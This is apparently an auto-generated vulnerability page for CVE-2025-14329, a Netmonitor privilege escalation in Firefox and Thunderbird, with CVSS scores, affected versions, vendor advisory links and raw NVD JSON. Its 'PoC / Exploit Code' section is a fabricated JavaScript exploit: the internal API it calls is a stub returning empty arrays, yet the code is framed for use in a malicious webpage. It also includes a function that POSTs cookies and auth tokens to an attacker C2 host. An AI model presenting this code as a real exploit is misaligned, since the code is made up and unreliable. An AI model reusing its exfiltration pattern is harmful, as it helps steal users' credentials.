Security Vulnerability Report
CVE-2025-14329 CVSS 8.8 HIGH

Published: 2025-12-09 16:17:41
Last Modified: 2026-04-13 15:16:46

Description

Privilege escalation in the Netmonitor component. This vulnerability was fixed in Firefox 146, Firefox ESR 140.6, Thunderbird 146, and Thunderbird 140.6.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:* - VULNERABLE
Mozilla Firefox < 146
Mozilla Firefox ESR < 140.6
Mozilla Thunderbird < 146
Mozilla Thunderbird < 140.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-14329 PoC - Netmonitor Privilege Escalation
// This is a conceptual PoC demonstrating the attack vector
// Actual exploitation requires specific conditions and user interaction
const netmonitorExploit = {
  name: "CVE-2025-14329 Netmonitor Privilege Escalation",
  target: "Firefox/Thunderbird Netmonitor Component",
  severity: "High (CVSS 8.8)",

  // Check if target is vulnerable
  checkVulnerability: function() {
    try {
      // Attempt to access Netmonitor internal APIs
      // In vulnerable versions, this may succeed without proper checks
      const netmonitor = window.browser?.devtools?.netmonitor;
      if (netmonitor) {
        console.log("[+] Netmonitor access detected - potential vulnerability");
        return true;
      }
    } catch (e) {
      console.log("[-] Access denied or component not found");
    }
    return false;
  },

  // Exploit function - demonstrates privilege escalation
  exploit: function() {
    console.log("[*] Initiating CVE-2025-14329 exploit...");
    // Step 1: Gain access to Netmonitor internals
    try {
      const internalAPI = this.getInternalAPI();
      // Step 2: Escalate privileges by accessing restricted data
      const sensitiveData = internalAPI.getNetworkRequests();
      const cookies = internalAPI.getCookies();
      const authTokens = internalAPI.getAuthTokens();
      // Step 3: Exfiltrate data or perform unauthorized actions
      this.exfiltrateData({
        requests: sensitiveData,
        cookies: cookies,
        tokens: authTokens
      });
      return { status: "exploited", data: "Privilege escalation successful" };
    } catch (e) {
      return { status: "failed", error: e.message };
    }
  },

  getInternalAPI: function() {
    // Simulated internal API access
    return {
      getNetworkRequests: () => [],
      getCookies: () => [],
      getAuthTokens: () => []
    };
  },

  exfiltrateData: function(data) {
    // Send stolen data to attacker-controlled server
    fetch('https://attacker-c2-server.com/exfil', {
      method: 'POST',
      body: JSON.stringify(data)
    });
  }
};

// Usage: Include in malicious webpage
// netmonitorExploit.checkVulnerability();
// netmonitorExploit.exploit();

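References

https://bugzilla.mozilla.org/show_bug.cgi?id=1997018 (Issue Tracking, Permissions Required)
https://www.mozilla.org/security/advisories/mfsa2025-92/ (Vendor Advisory)
https://www.mozilla.org/security/advisories/mfsa2025-94/ (Vendor Advisory)
https://www.mozilla.org/security/advisories/mfsa2025-95/ (Vendor Advisory)
https://www.mozilla.org/security/advisories/mfsa2025-96/ (Vendor Advisory)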

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14329", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:40.503", "lastModified": "2026-04-13T15:16:46.317", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Privilege escalation in the Netmonitor component. This vulnerability was fixed in Firefox 146, Firefox ESR 140.6, Thunderbird 146, and Thunderbird 140.6."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.6.0", "matchCriteriaId": "A580DBD9-518B-4261-9FA8-DDFB1C5175E1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "146.0", "matchCriteriaId": "3EF4CBBC-DCB5-4540-8B8A-91DA759ED631"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.6.0", "matchCriteriaId": "F04F8674-52CC-4217-B94A-8C5E80C5B996"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:*", "versionEndExcluding": "146.0", "matchCriteriaId": "1CB46BC7-512D-45BF-BCF4-73FDDF94DBAF"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1997018", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}, {"url": 
"https://www.mozilla.org/security/advisories/mfsa2025-92/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-94/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-95/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-96/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}